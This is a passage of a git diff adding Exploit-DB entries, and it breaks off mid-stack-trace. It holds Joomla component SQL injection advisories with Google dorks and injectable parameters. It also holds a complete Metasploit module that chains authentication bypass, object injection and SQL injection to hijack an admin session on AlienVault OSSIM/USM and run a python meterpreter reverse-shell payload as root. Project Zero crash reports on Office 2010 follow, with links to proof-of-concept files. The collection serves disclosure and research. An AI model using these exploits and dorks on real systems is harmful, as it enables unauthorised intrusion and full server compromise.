+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41406.txt b/platforms/php/webapps/41406.txt
new file mode 100755
index 000000000..b9790dd04
--- /dev/null
+++ b/platforms/php/webapps/41406.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component J-CruiseReservation Standard v3.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jcruisereservation
+# Date: 21.02.2017
+# Vendor Homepage: http://www.cmsjunkie.com/
+# Software Buy: http://www.cmsjunkie.com/ajax/index/options/product_id/58/
+# Demo: http://demo.cmsjunkie.com/cruise/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/cruises/cruises?city=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41407.txt b/platforms/php/webapps/41407.txt
new file mode 100755
index 000000000..4a9bae1f4
--- /dev/null
+++ b/platforms/php/webapps/41407.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component Eventix Events Calendar v1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_eventix
+# Date: 21.02.2017
+# Vendor Homepage: http://informafix.fr/
+# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/eventix-events-calendar/
+# Demo: http://demo.informafix.fr/index.php?option=com_eventix
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=2017-02-16&day=[SQL]
+# http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=[SQL]
+# http://localhost/[PATH]/index.php?option=com_eventix&view=eventssearch&=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41408.txt b/platforms/php/webapps/41408.txt
new file mode 100755
index 000000000..b1d4e97a2
--- /dev/null
+++ b/platforms/php/webapps/41408.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component J-MultipleHotelReservation Standard v6.0.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jcruisereservation
+# Date: 21.02.2017
+# Vendor Homepage: http://www.cmsjunkie.com/
+# Software Buy: http://www.cmsjunkie.com/joomla_multi_hotel_reservation_standard
+# Demo: http://hoteldemo.cmsjunkie.com/j3/multiple_standard/
+# Version: 6.0.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41409.txt b/platforms/php/webapps/41409.txt
new file mode 100755
index 000000000..6bb032017
--- /dev/null
+++ b/platforms/php/webapps/41409.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component Directorix Directory Manager v1.1.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_directorix
+# Date: 21.02.2017
+# Vendor Homepage: http://informafix.fr/
+# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/address-book/directorix-directory-manager/
+# Demo: http://demo.informafix.fr/index.php?option=com_directorix
+# Version: 1.1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_directorix&view=entriessearch&search_categories[]=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41410.txt b/platforms/php/webapps/41410.txt
new file mode 100755
index 000000000..457ff744a
--- /dev/null
+++ b/platforms/php/webapps/41410.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component Magic Deals Web v1.2.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_magicdealsweb
+# Date: 21.02.2017
+# Vendor Homepage: http://jasonwebdesign.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/e-commerce/gifts-a-coupons/magic-deals-web/
+# Demo: http://magicdealsweb.jasonwebdesign.com/
+# Version: 1.2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?filterbycats=all&fullordering=[SQL]&option=com_magicdealsweb&task=dealswebindex&view=dealswebindex
+# http://localhost/[PATH]/index.php?filterbycats=[SQL]=final_price+DESC&option=com_magicdealsweb&task=dealswebindex&view=dealswebindex
+# http://localhost/[PATH]/index.php/component/magicdealsweb/?option=com_magicdealsweb&view=search&search_in=11&q=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41411.txt b/platforms/php/webapps/41411.txt
new file mode 100755
index 000000000..69ffde96c
--- /dev/null
+++ b/platforms/php/webapps/41411.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component J-BusinessDirectory v4.6.8 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jbusinessdirectory
+# Date: 21.02.2017
+# Vendor Homepage: http://www.cmsjunkie.com/
+# Software Buy: http://www.cmsjunkie.com/ajax/index/options/product_id/73/
+# Demo: http://demo.cmsjunkie.com/j-businessdirectory/
+# Version: 4.6.8
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=companies&companyId=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=search&searchkeyword=1&categoryId=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41412.txt b/platforms/php/webapps/41412.txt
new file mode 100755
index 000000000..3916973e7
--- /dev/null
+++ b/platforms/php/webapps/41412.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component AppointmentBookingPro v4.0.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_rsappt_pro3
+# Date: 21.02.2017
+# Vendor Homepage: http://appointmentbookingpro.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/appointmentbookingpro/
+# Demo: http://demo.appointmentbookingpro.com/
+# Version: 4.0.1 / 4.0.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/component/rsappt_pro3/booking_screen_gad/891/show_confirmation/ff09f352c87f96e505706df0cfa3e8cc/999[SQL]
+# http://localhost/[PATH]/index.php?option=com_rsappt_pro3&view=resourceslist&tags=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41424.rb b/platforms/php/webapps/41424.rb
new file mode 100755
index 000000000..58790df1a
--- /dev/null
+++ b/platforms/php/webapps/41424.rb
@@ -0,0 +1,322 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::SSH
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "AlienVault OSSIM/USM Remote Code Execution",
+ 'Description' => %q{
+ This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together.
+ Unauthenticated users can execute arbitrary commands under the context of the root user.
+
+ By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability
+ which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue
+ action and policy that enables to execute operating system commands by using captured session token. As a final step,
+ SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes
+ operating system command with root user privileges.
+
+ This module was tested against following product and versions:
+ AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.0
+ AlienVault OSSIM 5.0.0, 4.6.1
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Peter Lapp', # EDB advisory owner
+ 'Mehmet Ince ' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/'],
+ ['EDB', '40682']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'SSL' => true,
+ 'WfsDelay' => 10,
+ 'Payload' => 'python/meterpreter/reverse_tcp'
+ },
+ 'Platform' => ['python'],
+ 'Arch' => ARCH_PYTHON,
+ 'Targets' =>
+ [
+ ['Alienvault USM/OSSIM <= 5.3.0', {}]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => "Jan 31 2017",
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
+ ], self.class)
+ end
+
+
+ def check
+ r = rand_text_alpha(15)
+ p = "a:1:{s:4:\"type\";s:69:\"1 AND extractvalue(rand(),concat(0x3a,(SELECT '#{r}')))-- \";}"
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
+ 'headers' => {
+ 'User-Agent' => 'AV Report Scheduler',
+ },
+ 'vars_get' => {
+ 'type' => 'alarm',
+ 'wtype' => 'foo',
+ 'asset' => 'ALL_ASSETS',
+ 'height' => 1,
+ 'value' => p
+ }
+ })
+
+ if res && res.code == 200 && res.body =~ /XPATH syntax error: ':#{r}'/
+ Exploit::CheckCode::Vulnerable
+ else
+ Exploit::CheckCode::Safe
+ end
+
+ end
+
+
+ def exploit
+ # Hijacking Administrator session by exploiting objection injection vuln that end up with sqli
+ print_status("Hijacking administrator session")
+
+ sql = "SELECT id FROM sessions LIMIT 1"
+ p = "a:1:{s:4:\"type\";s:#{(sql.length + 58).to_s}:\"1 AND extractvalue(rand(),concat(0x3a3a3a,(#{sql}),0x3a3a3a))-- \";}"
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
+ 'headers' => {
+ 'X-Forwarded-For' => rhost.to_s,
+ 'User-Agent' => 'AV Report Scheduler',
+ },
+ 'vars_get' => {
+ 'type' => 'alarm',
+ 'wtype' => 'foo',
+ 'asset' => 'ALL_ASSETS',
+ 'height' => 1,
+ 'value' => p
+ }
+ })
+ if res && res.code == 200 && res.body =~ /XPATH syntax error: ':::(.*):::'/
+ admin_session = $1
+ cookie = "PHPSESSID=#{admin_session}"
+ print_good("Admin session token : #{cookie}")
+ else
+ fail_with(Failure::Unknown, "Session table is empty. Wait until someone logged in and try again")
+ end
+
+ # Creating a Action that contains payload.
+ print_status("Creating rogue action")
+ r = rand_text_alpha(15)
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'ossim', 'action', 'modifyactions.php'),
+ 'cookie' => cookie,
+ 'headers' => {
+ 'X-Forwarded-For' => rhost.to_s,
+ },
+ 'vars_post' => {
+ 'id' => '',
+ 'action' => 'new',
+ 'old_name' => '',
+ 'action_name' => r,
+ 'ctx' => '',
+ 'old_descr' => '',
+ 'descr' => r,
+ 'action_type' => '2',
+ 'only' => 'on',
+ 'cond' => 'True',
+ 'email_from' => '',
+ 'email_to' => 'email;email;email',
+ 'email_subject' => '',
+ 'email_message' => '',
+ 'transferred_user' => '',
+ 'transferred_entity' => '',
+ 'exec_command' => "python -c \"#{payload.encoded}\""
+ }
+ })
+
+ if res && res.code == 200 && res.body.include?("Action successfully updated")
+ print_good("Action created: #{r}")
+ else
+ fail_with(Failure::Unknown, "Unable to create action")
+ end
+
+ # Retrieving the policy id. Authentication Bypass with User-Agent Doesn't work for this endpoint.
+ # Thus we're using hijacked administrator session.
+ print_status("Retrieving rogue action id")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
+ 'cookie' => cookie,
+ 'headers' => {
+ 'X-Forwarded-For' => rhost.to_s,
+ },
+ 'vars_get' => {
+ 'page' => '1',
+ 'rp' => '2000'
+ }
+ })
+
+ if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{r}<\/a>/
+ action_id = $1
+ print_good("Corresponding Action ID found: #{action_id}")
+ else
+ fail_with(Failure::Unknown, "Unable to retrieve action id")
+ end
+
+ # Retrieving the policy data. We will use it while creating policy
+ print_status("Retrieving policy ctx and group values")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
+ 'cookie' => cookie,
+ 'headers' => {
+ 'X-Forwarded-For' => rhost.to_s,
+ },
+ 'vars_get' => {
+ 'm_opt' => 'configuration',
+ 'sm_opt' => 'threat_intelligence',
+ 'h_opt' => 'policy'
+ }
+ })
+
+ if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
+ policy_ctx = $1
+ policy_group = $2
+ print_good("CTX Value found: #{policy_ctx}")
+ print_good("GROUP Value found: #{policy_group}")
+ else
+ fail_with(Failure::Unknown, "Unable to retrieve policy data")
+ end
+
+ # Creating policy that will be trigerred when SSH authentication failed due to wrong password.
+ print_status("Creating a policy that uses our rogue action")
+ policy = rand_text_alpha(15)
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
+ 'cookie' => cookie,
+ 'headers' => {
+ 'X-Forwarded-For' => rhost.to_s,
+ },
+ 'vars_post' => {
+ 'descr' => policy,
+ 'active' => '1',
+ 'group' => policy_group,
+ 'ctx' => policy_ctx,
+ 'order' => '1',
+ 'action' => 'new',
+ 'sources[]' => '00000000000000000000000000000000',
+ 'dests[]' => '00000000000000000000000000000000',
+ 'portsrc[]' => '0',
+ 'portdst[]' => '0',
+ 'plug_type' => '1',
+ 'plugins[0]' => 'on',
+ 'taxfilters[]' =>'25@2@0',
+ 'tax_pt' => '0',
+ 'tax_cat' => '0',
+ 'tax_subc' => '0',
+ 'mboxs[]' => '00000000000000000000000000000000',
+ 'rep_act' => '0',
+ 'rep_sev' => '1',
+ 'rep_rel' => '1',
+ 'rep_dir' => '0',
+ 'ev_sev' => '1',
+ 'ev_rel' => '1',
+ 'tzone' => 'Europe/Istanbul',
+ 'date_type' => '1',
+ 'begin_hour' => '0',
+ 'begin_minute' => '0',
+ 'begin_day_week' => '1',
+ 'begin_day_month' => '1',
+ 'begin_month' => '1',
+ 'end_hour' => '23',
+ 'end_minute' => '59',
+ 'end_day_week' => '7',
+ 'end_day_month' => '31',
+ 'end_month' => '12',
+ 'actions[]' => action_id,
+ 'sim' => '1',
+ 'priority' => '1',
+ 'qualify' => '1',
+ 'correlate' => '0',
+ 'cross_correlate' => '0',
+ 'store' => '0'
+ }
+ })
+
+ if res && res.code == 200
+ print_good("Policy created: #{policy}")
+ else
+ fail_with(Failure::Unknown, "Unable to create policy id")
+ end
+
+ # We gotta reload all policies in order to make our rogue one enabled.
+ print_status("Activating the policy")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
+ 'cookie' => cookie,
+ 'headers' => {
+ 'X-Forwarded-For' => rhost.to_s,
+ },
+ 'vars_get' => {
+ 'what' => 'policies',
+ 'back' => '../policy/policy.php'
+ }
+ })
+
+ if res && res.code == 200
+ print_good("Rogue policy activated")
+ else
+ fail_with(Failure::Unknown, "#{peer} - Unable to enable rogue policy")
+ end
+
+ # We will trigger the rogue policy by doing ssh auth attempt with invalid credential :-)
+ factory = ssh_socket_factory
+ opts = {
+ auth_methods: ['password'],
+ port: 22,
+ use_agent: false,
+ config: false,
+ password: rand_text_alpha(15),
+ proxy: factory,
+ non_interactive: true
+ }
+
+ print_status("Triggering the policy by performing SSH login attempt")
+
+ begin
+ Net::SSH.start(rhost, "root", opts)
+ rescue Net::SSH::AuthenticationFailed
+ print_good("SSH - Failed authentication. That means our policy and action will be trigged..!")
+ rescue Net::SSH::Exception => e
+ print_error("SSH Error: #{e.class} : #{e.message}")
+ return nil
+ end
+
+ end
+end
\ No newline at end of file
diff --git a/platforms/windows/dos/41417.txt b/platforms/windows/dos/41417.txt
new file mode 100755
index 000000000..63938858e
--- /dev/null
+++ b/platforms/windows/dos/41417.txt
@@ -0,0 +1,83 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=949
+
+Platform: Microsoft Office 2010 on Windows 7 x86
+Class: heap memory corruption
+
+The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled. This crash appeared to be non-deterministic depending on memory layout and will not reproduce in all instances but the crash demonstrated a high degree of reliability.
+
+Attached files:
+2581805226.ppt: fuzzed crashing file
+
+File versions:
+mso.dll: 14.0.7173.5000
+gfx.dll: 14.0.7104.5000
+oart.dll: 14.0.7169.5000
+riched20.dll: 14.0.7155.5000
+msptls.dll: 14.0.7164.5000
+
+((7ac.a64): Access violation - code c0000005 (first chance)
+eax=200bcf3a ebx=1febce30 ecx=1febce2c edx=77cf6b01 esi=1febce34 edi=1febce18
+eip=66a19941 esp=0027008c ebp=002700d8 iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+mso!Ordinal5429+0x376:
+66a19941 0fb708 movzx ecx,word ptr [eax] ds:0023:200bcf3a=????
+
+
+66a1993c 8b4104 mov eax,dword ptr [ecx+4] ; Length 0x00200122
+66a1993f 03c7 add eax,edi
+=> 66a19941 0fb708 movzx ecx,word ptr [eax] ds:0023:200bcf3a=????
+66a19944 894dfc mov dword ptr [ebp-4],ecx
+66a19947 8a55fd mov dl,byte ptr [ebp-3]
+66a1994a 8855fc mov byte ptr [ebp-4],dl
+66a1994d 884dfd mov byte ptr [ebp-3],cl
+66a19950 66837dfc04 cmp word ptr [ebp-4],4
+66a19955 0f85e0010000 jne mso!Ordinal5429+0x570 (66a19b3b)
+66a1995b 8a08 mov cl,byte ptr [eax]
+66a1995d 8a5001 mov dl,byte ptr [eax+1]
+66a19960 8810 mov byte ptr [eax],dl
+66a19962 884801 mov byte ptr [eax+1],cl
+
+0:000> kb
+ChildEBP RetAddr Args to Child
+WARNING: Stack unwind information not available. Following frames may be wrong.
+002700d8 66a19527 20099000 0000c000 2e010b53 mso!Ordinal5429+0x376
+002701ac 66a19348 1febefa0 042109c7 042109c7 mso!Ordinal10199+0x2138
+002701c8 66a192a9 00270240 042109c7 00000001 mso!Ordinal10199+0x1f59
+00270288 66a18c32 042109c7 0027038c 00000004 mso!Ordinal10199+0x1eba
+00270474 66a18bb5 042109c7 1feeaff8 00000002 mso!Ordinal10199+0x1843
+00270498 6b256c34 042109c7 1feeaff8 00000002 mso!Ordinal10199+0x17c6
+002704bc 6b2570e0 042109c7 1feeaff8 00000002 gfx!Ordinal980+0xa2
+00270570 6b256bd4 0b558dc8 1feeaff8 00000002 gfx!Ordinal818+0x306
+002705bc 67821180 002705fc 1feeaff8 00000002 gfx!Ordinal980+0x42
+0027061c 67820b5a 00000002 1ba92e18 1feeaff8 oart!Ordinal2842+0xb6c
+00270690 6781fed8 00000000 001f2ff0 00270924 oart!Ordinal2842+0x546
+002706e0 61c2000c 00270724 00000000 00000000 oart!Ordinal7653+0x7d3
+00270878 61c1f736 002708a8 00000000 00000064 riched20!RichListBoxWndProc+0x50da
+002708b0 61c1edb1 00000000 0000ffff 00000000 riched20!RichListBoxWndProc+0x4804
+002709a0 61c1e7ba 00000000 00000001 00000000 riched20!RichListBoxWndProc+0x3e7f
+002709d4 6aa75d8c 0a7c1c38 00000000 00000000 riched20!RichListBoxWndProc+0x3888
+00270a54 6aa6ef12 1f9b4ef8 00000000 00270c2c MSPTLS!LssbFIsSublineEmpty+0x16269
+00270c5c 6aa54c98 0a7c3a78 00000000 00004524 MSPTLS!LssbFIsSublineEmpty+0xf3ef
+00270c90 61c1c803 0a7c3a78 00000000 00004524 MSPTLS!LsCreateLine+0x23
+00270db0 61c1c659 00000003 00000000 ffffffff riched20!RichListBoxWndProc+0x18d1
+00270e08 61c0f36a 00271770 00000003 00000000 riched20!RichListBoxWndProc+0x1727
+
+In this crash eax is pointing to an invalid memory region and is being dereferenced causing an access violation. There is a clear path to an out of bounds memory write shortly after the current crashing instruction. The value in eax came from edi + [ecx+4]. The value in [ecx+4] appears to a length with a single bit flipped, 0x00200122 instead of 0x00000122. The heap chunk allocated for this came from:
+
+0:000> !heap -p -a 0x1febce18
+ address 1febce18 found in
+ _DPH_HEAP_ROOT @ 71000
+ in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
+ 1feb171c: 1febce18 1e2 - 1febc000 2000
+ 6eac8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
+ 77d7616e ntdll!RtlDebugAllocateHeap+0x00000030
+ 77d3a08b ntdll!RtlpAllocateHeap+0x000000c4
+ 77d05920 ntdll!RtlAllocateHeap+0x0000023a
+ 6fcdad1a vrfcore!VerifierSetAPIClassName+0x000000aa
+ 6fc816ac vfbasics+0x000116ac
+ 67080c59 mso!Ordinal9770+0x000078e2
+ 66a19527 mso!Ordinal10199+0x00002138
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41417.zip
diff --git a/platforms/windows/dos/41418.txt b/platforms/windows/dos/41418.txt
new file mode 100755
index 000000000..70ff4bd3d
--- /dev/null
+++ b/platforms/windows/dos/41418.txt
@@ -0,0 +1,116 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=950
+
+Platform: Microsoft Office 2010 on Windows 7 x86
+Class: Time of check time of use leading to memory corruption
+
+The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled. This crash is non-deterministic and will not reproduce in all instances but the crash demonstrated a high degree of reliability.
+
+Attached files:
+910494862.ppt: fuzzed crashing file
+
+File versions:
+mso.dll: 14.0.7173.5000
+oart.dll: 14.0.7169.5000
+ppcore.dll: 14.0.7173.5000
+
+(510.66c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=1a6f0fb0 ebx=3c782fc4 ecx=1a53cfe0 edx=000004bf esi=1a53cfe0 edi=1a4d6fc0
+eip=66acdf93 esp=0013d8b0 ebp=0013d8bc iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
+mso!Ordinal4899+0xd33:
+66acdf93 f6465804 test byte ptr [esi+58h],4 ds:0023:1a53d038=??
+
+0:000> uf 0x66acdf8b
+mso!Ordinal4899+0xd2b:
+66acdf8b 55 push ebp
+66acdf8c 8bec mov ebp,esp
+66acdf8e 51 push ecx
+66acdf8f 51 push ecx
+66acdf90 56 push esi
+66acdf91 8bf1 mov esi,ecx
+=> 66acdf93 f6465804 test byte ptr [esi+58h],4
+
+Call Stack:
+
+0:000> kb
+ChildEBP RetAddr Args to Child
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0013d8bc 66ba7720 00000000 1a9d6f98 66ad3d33 mso!Ordinal4899+0xd33
+0013d948 67908f0d 1a996e30 1a9d6f98 0000001a mso!Ordinal4720+0x201
+0013d980 67906400 0013d9fc 679063f4 0013d9fc oart!Ordinal7979+0x35
+0013d994 67908f30 2cccaf58 0013d9fc 0013d9cc oart!Ordinal2490+0x10b
+0013d9a4 677e2a14 0013d9fc 1a4d6fd8 1a984ff0 oart!Ordinal7979+0x58
+0013d9cc 677e2999 1a4d6ff0 0013d9fc 0013da0c oart!Ordinal6+0xc4
+0013d9dc 6788730f 0013d9fc 3a5fe1a5 1a554f8c oart!Ordinal6+0x49
+0013da0c 68c8e465 3c782fc4 3a5ff871 68b7e504 oart!Ordinal1989+0xaa
+0013da44 68c985dd 3a5fc635 0013e4b4 68b8661c ppcore!PPMain+0x9130c
+0013e400 68d0540f 00000000 3c886ea0 00000001 ppcore!PPMain+0x9b484
+
+In this crash the pointer being dereferenced in esi is being tested for a flag value. However, the pointer is referencing invalid memory generating an access violation. The esi value came from the ecx register which is presumably the this pointer. Previous chunk at esi-0x58 is valid memory but 0x58 is beyond that allocated size of that chunk:
+
+0:000> !heap -p -a 19841038
+ address 19841038 found in
+ _DPH_HEAP_ROOT @ 11a1000
+ in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
+ 197f1d9c: 19840fe0 20 - 19840000 2000
+ 70588e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
+ 778c616e ntdll!RtlDebugAllocateHeap+0x00000030
+ 7788a08b ntdll!RtlpAllocateHeap+0x000000c4
+ 77855920 ntdll!RtlAllocateHeap+0x0000023a
+ 710ead1a vrfcore!VerifierSetAPIClassName+0x000000aa
+ 6d7b16ac vfbasics+0x000116ac
+ 60b20233 mso!Ordinal9052+0x0000713f
+ 67808744 oart!Ordinal2033+0x00000090
+ 678086ab oart!Ordinal6561+0x000000ac
+ 6781af9f oart!Ordinal5870+0x00000060
+
+Looking at the calling function:
+
+0:000> uf 0x66ba76ef
+mso!Ordinal4720+0x1d0:
+66ba76ef 56 push esi
+66ba76f0 8bf1 mov esi,ecx
+66ba76f2 e8a7ddfaff call mso!Ordinal8038+0x461 (66b5549e) ; first call
+66ba76f7 85c0 test eax,eax
+66ba76f9 7427 je mso!Ordinal4720+0x203 (66ba7722)
+
+mso!Ordinal4720+0x1dc:
+66ba76fb 8bce mov ecx,esi
+66ba76fd e89cddfaff call mso!Ordinal8038+0x461 (66b5549e) ; second call
+66ba7702 83781400 cmp dword ptr [eax+14h],0
+66ba7706 741a je mso!Ordinal4720+0x203 (66ba7722)
+
+mso!Ordinal4720+0x1e9:
+66ba7708 8bce mov ecx,esi
+66ba770a e88fddfaff call mso!Ordinal8038+0x461 (66b5549e) ; third call
+66ba770f 8b4014 mov eax,dword ptr [eax+14h]
+66ba7712 8b4810 mov ecx,dword ptr [eax+10h] ; crashing ecx value
+66ba7715 85c9 test ecx,ecx
+66ba7717 7413 je mso!Ordinal4720+0x20d (66ba772c)
+
+mso!Ordinal4720+0x1fa:
+66ba7719 6a00 push 0
+66ba771b e86b68f2ff call mso!Ordinal4899+0xd2b (66acdf8b) ; crashing function
+66ba7720 5e pop esi
+66ba7721 c3 ret
+
+mso!Ordinal4720+0x203:
+66ba7722 f6465804 test byte ptr [esi+58h],4 ; same check as crashing function
+66ba7726 7404 je mso!Ordinal4720+0x20d (66ba772c)
+
+mso!Ordinal4720+0x209:
+66ba7728 8bce mov ecx,esi
+66ba772a ebed jmp mso!Ordinal4720+0x1fa (66ba7719)
+
+mso!Ordinal4720+0x20d:
+66ba772c b8ff0f0000 mov eax,0FFFh
+66ba7731 5e pop esi
+66ba7732 c3 ret
+
+Looking at the logic flow from this function we see at the very first call to mso!Ordinal8038+0x461 must return a non-null value or else the same check in the crashing function is performed in the calling function. With a non-null return this same function is called again only this time the value at [eax+0x14h] is checked to be non-null. If this second check passed then the we call the same function a third time! This time we follow the pointer at [[eax+0x14]+0x10] and check it to be non-null before passing it to the crashing function. Given the repeating calls to the same function and the non-determinism of the bug I suspect this is a time of check time of use bug on the object implementing these methods.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41418.zip
diff --git a/platforms/windows/dos/41419.txt b/platforms/windows/dos/41419.txt
new file mode 100755
index 000000000..bc6bc5755
--- /dev/null
+++ b/platforms/windows/dos/41419.txt
@@ -0,0 +1,75 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=951
+
+Platform: GDI on Windows 7 x86 reachable from Microsoft Office 2010
+Class: Out of bounds memory access
+
+The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled.
+
+Attached files:
+2167705722.ppt: fuzzed crashing file
+
+File versions:
+gdi32.dll: 6.1.7601.23457
+gdiplus.dll: 6.1.7601.23508
+gfx.dll: 14.0.7104.5000
+oart.dll: 14.0.7169.5000
+
+(788.ca0): Access violation - code c0000005 (first chance)
+eax=00000000 ebx=0747bc5c ecx=00000001 edx=16ab9fd8 esi=1c45dcb8 edi=223e3000
+eip=77667a68 esp=1c45dc78 ebp=1c45dc84 iopl=0 nv up ei pl nz ac pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
+GDI32!ConvertDxArray+0x3c:
+77667a68 8b07 mov eax,dword ptr [edi] ds:0023:223e3000=????????
+
+0:014> kb
+ChildEBP RetAddr Args to Child
+1c45dc84 7765a2b3 000003a8 0747bc5c 223e2ff0 GDI32!ConvertDxArray+0x3c
